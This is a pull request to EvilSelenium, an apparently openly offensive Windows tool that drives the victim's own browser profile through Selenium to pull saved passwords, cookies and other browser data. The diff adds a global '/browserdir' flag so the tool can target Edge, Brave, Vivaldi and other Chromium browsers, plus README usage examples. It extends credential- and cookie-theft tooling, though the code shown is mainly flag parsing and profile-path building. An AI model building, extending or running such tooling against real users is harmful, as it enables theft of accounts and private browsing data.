### PR TITLE
Add flag to support all Chromium based browsers

### DIFF
--- a/Misc/Helpers.cs
+++ b/Misc/Helpers.cs
@@ -1,4 +1,5 @@
 ﻿using System;
+using System.IO;
 using System.Diagnostics;
 using System.Text;
 using OpenQA.Selenium;
@@ -14,6 +15,8 @@ namespace EvilSelenium.Misc
     /* Generic helper functions */
     class Helpers
     {
+        public static string BrowserRouting = @"Google\Chrome";
+
         [DllImport("advapi32.dll", SetLastError = true)]
         static extern bool GetUserName(System.Text.StringBuilder sb, ref Int32 length);
 
@@ -43,7 +46,12 @@ namespace EvilSelenium.Misc
             service.SuppressInitialDiagnosticInformation = true;
             ChromeOptions options = new ChromeOptions();
 
-            options.AddArgument(@"user-data-dir=C:\Users\" + Buffer.ToString() + @"\AppData\Local\Google\Chrome\User Data");
+            string user_data_dir = String.Format(@"C:\Users\{0}\AppData\Local\{1}\User Data", Buffer.ToString(), BrowserRouting);
+
+            if (!Directory.Exists(user_data_dir))
+                throw new Exception($"Assembeled browser user-data-dir is invalid: {user_data_dir}");
+
+            options.AddArgument($@"user-data-dir={user_data_dir}");
             options.AddArgument("log-level=3");
             options.AddArgument("window-position=5000,1000");
             options.AddExcludedArgument("enable-logging");

--- a/Program.cs
+++ b/Program.cs
@@ -3,6 +3,7 @@ using EvilSelenium.Misc;
 using EvilSelenium.Commands;
 using EvilSelenium.Credentials;
 using EvilSelenium.Cookies;
+using System.Collections.Generic;
 
 namespace EvilSelenium
 {
@@ -18,7 +19,8 @@ namespace EvilSelenium
             else if(args.Length > 0){
                 try
                 {
-                    if(args[0] == "/help" || args[0] == "/?")
+                    args = ParseGlobalFlags(args);
+                    if (args[0] == "/help" || args[0] == "/?")
                     {
                         UsageMenu();
                     }
@@ -152,6 +154,26 @@ namespace EvilSelenium
             
         }
 
+        public static string[] ParseGlobalFlags(string[] args)
+        {
+            List<string> arguments = new List<string>(args);
+            var custom_user_data_flag = arguments.IndexOf("/custom_browser");
+            // If flag is not shown - ignore
+            if (custom_user_data_flag == -1)
+                return args;
+            else if (args.Length >= custom_user_data_flag + 1)
+            {
+                Helpers.BrowserRouting = arguments[custom_user_data_flag + 1];
+                // Pop the flag value e.g. "Microsoft\Edge"
+                arguments.RemoveAt(custom_user_data_flag + 1);
+
+            }
+
+            // Pop the flag "/custom_browser"
+            arguments.RemoveAt(custom_user_data_flag);
+            return arguments.ToArray();
+        }
+
         public static void UsageMenu()
         {
             string usage = @"
@@ -160,6 +182,9 @@ namespace EvilSelenium
 
     SETUP:
     /install - Install chromedriver & Selenium webdriver. Run this once.
+
+    GLOBAL: (accepted with every command)
+    /custom_browser [appdata_local_routing] - Use custom browser, Input should be the routing inside %appdatalocal% dir (e.g. ""Microsoft\Edge"")
 
     RECON:
     /enumsavedsites [out_path] - Check which websites have passwords saved via screenshot(s).

--- a/Program.cs
+++ b/Program.cs
@@ -157,7 +157,7 @@ namespace EvilSelenium
         public static string[] ParseGlobalFlags(string[] args)
         {
             List<string> arguments = new List<string>(args);
-            var custom_user_data_flag = arguments.IndexOf("/custom_browser");
+            var custom_user_data_flag = arguments.IndexOf("/browserdir");
             // If flag is not shown - ignore
             if (custom_user_data_flag == -1)
                 return args;
@@ -169,7 +169,7 @@ namespace EvilSelenium
 
             }
 
-            // Pop the flag "/custom_browser"
+            // Pop the flag "/browserdir"
             arguments.RemoveAt(custom_user_data_flag);
             return arguments.ToArray();
         }
@@ -184,7 +184,7 @@ namespace EvilSelenium
     /install - Install chromedriver & Selenium webdriver. Run this once.
 
     GLOBAL: (accepted with every command)
-    /custom_browser [appdata_local_routing] - Use custom browser, Input should be the routing inside %appdatalocal% dir (e.g. ""Microsoft\Edge"")
+    /browserdir [appdata_local_routing] -Use custom Chromium-based browser by providing its directory name within %appdatalocal% (e.g. ""Microsoft\Edge"")
 
     RECON:
     /enumsavedsites [out_path] - Check which websites have passwords saved via screenshot(s).

--- a/README.md
+++ b/README.md
@@ -28,6 +28,9 @@ Or extend the existing functionality to suit your needs (e.g. Download files fro
     SETUP:
     /install - Install chromedriver & Selenium webdriver. Run this once.
 
+    GLOBAL: (accepted with every command)
+    /custom_browser [appdata_local_routing] - Use custom browser, Input should be the routing inside %appdatalocal% dir (e.g. "Microsoft\Edge")
+
     RECON:
     /enumsavedsites [out_path] - Check which websites have passwords saved via screenshot(s).
     /screenshot [website] [out_path] - Screenshot a given webpage.
@@ -57,6 +60,14 @@ The `/install` command will download the Chrome Driver and Selenium WebDriver wh
 **Tested on Windows 10, Chrome v97 & v90.**
 
 	EvilSelenium.exe /install
+
+# Global configuration
+By default EvilSelenium will try to use Google Chrome's User Data folder to retrieve data, but other [Chromium](https://en.wikipedia.org/wiki/Chromium_(web_browser)) based browsers are supported as well.
+In order to use different Chrome based browser you should add the `/custom_browser` following the browser routing in the `%localappdata%` directory.
+Here are examples for a few common browsers (should be added to any CLI command):
+1. *Brave* - `/custom_browser BraveSoftware\Brave-Browser`
+2. *Microsoft Edge* - `/custom_browser Microsoft\Edge`
+3. *Vivaldi* - `/custom_browser Vivaldi`
 
 # Recon Module
 

--- a/README.md
+++ b/README.md
@@ -62,12 +62,12 @@ The `/install` command will download the Chrome Driver and Selenium WebDriver wh
 	EvilSelenium.exe /install
 
 # Global configuration
-By default EvilSelenium will try to use Google Chrome's User Data folder to retrieve data, but other [Chromium](https://en.wikipedia.org/wiki/Chromium_(web_browser)) based browsers are supported as well.
-In order to use different Chrome based browser you should add the `/custom_browser` following the browser routing in the `%localappdata%` directory.
+By default EvilSelenium will try to use Google Chrome's User Data folder to retrieve data, but other [Chromium](https://en.wikipedia.org/wiki/Chromium_(web_browser)) based browsers are supported as well.<br>
+In order to use different Chrome based browsers you should add the `/custom_browser` following the browser routing in the `%localappdata%` directory.
 Here are examples for a few common browsers (should be added to any CLI command):
-1. *Brave* - `/custom_browser BraveSoftware\Brave-Browser`
-2. *Microsoft Edge* - `/custom_browser Microsoft\Edge`
-3. *Vivaldi* - `/custom_browser Vivaldi`
+1. **Brave** - `/custom_browser BraveSoftware\Brave-Browser`
+2. **Microsoft Edge** - `/custom_browser Microsoft\Edge`
+3. **Vivaldi** - `/custom_browser Vivaldi`
 
 # Recon Module
 

--- a/README.md
+++ b/README.md
@@ -29,7 +29,7 @@ Or extend the existing functionality to suit your needs (e.g. Download files fro
     /install - Install chromedriver & Selenium webdriver. Run this once.
 
     GLOBAL: (accepted with every command)
-    /custom_browser [appdata_local_routing] - Use custom browser, Input should be the routing inside %appdatalocal% dir (e.g. "Microsoft\Edge")
+    /browserdir [appdata_local_routing] - Use custom browser, Input should be the routing inside %appdatalocal% dir (e.g. "Microsoft\Edge")
 
     RECON:
     /enumsavedsites [out_path] - Check which websites have passwords saved via screenshot(s).
@@ -63,11 +63,11 @@ The `/install` command will download the Chrome Driver and Selenium WebDriver wh
 
 # Global configuration
 By default EvilSelenium will try to use Google Chrome's User Data folder to retrieve data, but other [Chromium](https://en.wikipedia.org/wiki/Chromium_(web_browser)) based browsers are supported as well.<br>
-In order to use different Chrome based browsers you should add the `/custom_browser` following the browser routing in the `%localappdata%` directory.
+In order to use different Chrome based browsers you should add the `/browserdir` following the browser routing in the `%localappdata%` directory.
 Here are examples for a few common browsers (should be added to any CLI command):
-1. **Brave** - `/custom_browser BraveSoftware\Brave-Browser`
-2. **Microsoft Edge** - `/custom_browser Microsoft\Edge`
-3. **Vivaldi** - `/custom_browser Vivaldi`
+1. **Brave** - `/browserdir BraveSoftware\Brave-Browser`
+2. **Microsoft Edge** - `/browserdir Microsoft\Edge`
+3. **Vivaldi** - `/browserdir Vivaldi`
 
 # Recon Module
 


### PR DESCRIPTION
Evil selenium is a great implementation to show that our browser data (including cookies, passwords, messages, and much more) is exposable for anyone at any privilege level.
It would be nice to support all Chrome-based browsers to show that not only Chrome is vulnerable to such an attack vector.
This PR introduces the option to add `/browserdir <Browser Dir>` to any of the EvilSelenium existing commands to use it on different browsers.